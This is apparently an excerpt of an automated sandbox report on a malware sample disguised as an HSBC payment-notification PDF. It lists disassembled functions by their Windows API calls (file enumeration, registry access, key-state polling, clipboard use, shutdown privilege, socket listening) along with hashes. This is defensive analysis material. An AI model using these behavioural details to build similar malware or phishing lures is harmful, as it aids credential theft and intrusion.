                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C890
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C8D3
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C927
                                                                                                                                                      • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C975
                                                                                                                                                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                                                                                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C9C4
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046CA13
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046CA62
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                                                    • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                                                                                    • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                                                                                                    • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                                                                                    • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046EFCB
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046EFE2
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F074
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F08B
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                                                    • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                    • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                                                                                                    • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                    • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                                                                                                    APIs
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                                                    • Opcode ID: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                                                                                                                                                    • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                                                                                                    • Opcode Fuzzy Hash: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                                                                                                                                                    • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                                                                                                    • API String ID: 0-559809668
                                                                                                                                                    • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                    • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                                                                                                    • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                    • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F128
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F13F
                                                                                                                                                      • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                                                    • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                    • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                                                                                                    • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                    • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046A231
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                                                                                    • _memset.LIBCMT ref: 0046A2B2
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                                                    • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                    • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                                                                                                    • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                    • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00460097
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00460102
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
• Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
• Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
• Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
APIs
  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
• RegCloseKey.ADVAPI32(00000000), ref: 0048082F
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
• Opcode ID: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
• Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
• Opcode Fuzzy Hash: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
• Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
APIs
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
• Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
• Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
• Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
• Sleep.KERNEL32(0000000A), ref: 0046F470
• _wcscmp.LIBCMT ref: 0046F484
• _wcscmp.LIBCMT ref: 0046F49F
• FindNextFileW.KERNEL32(?,?), ref: 0046F53D
• FindClose.KERNEL32(00000000), ref: 0046F553
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
• Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
• Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
• Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
• Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: __itow__swprintf
• String ID: 3cA$_A
• API String ID: 674341424-3480954128
• Opcode ID: fbe09424ec1f83488ee8510728e08dc1cab6b0ad1b3a11546317e8ca54923645
• Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
• Opcode Fuzzy Hash: fbe09424ec1f83488ee8510728e08dc1cab6b0ad1b3a11546317e8ca54923645
• Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
APIs
  • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
  • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
  • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
• ExitWindowsEx.USER32(?,00000000), ref: 004651F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
• Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
• Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
• Instruction Fuzzy Hash: D001F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
APIs
• socket.WSOCK32(00000002,00000001,00000006), ref: 004762DC
• WSAGetLastError.WSOCK32(00000000), ref: 004762EB
• bind.WSOCK32(00000000,?,00000010), ref: 00476307
• listen.WSOCK32(00000000,00000005), ref: 00476316
• WSAGetLastError.WSOCK32(00000000), ref: 00476330
• closesocket.WSOCK32(00000000), ref: 00476344
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
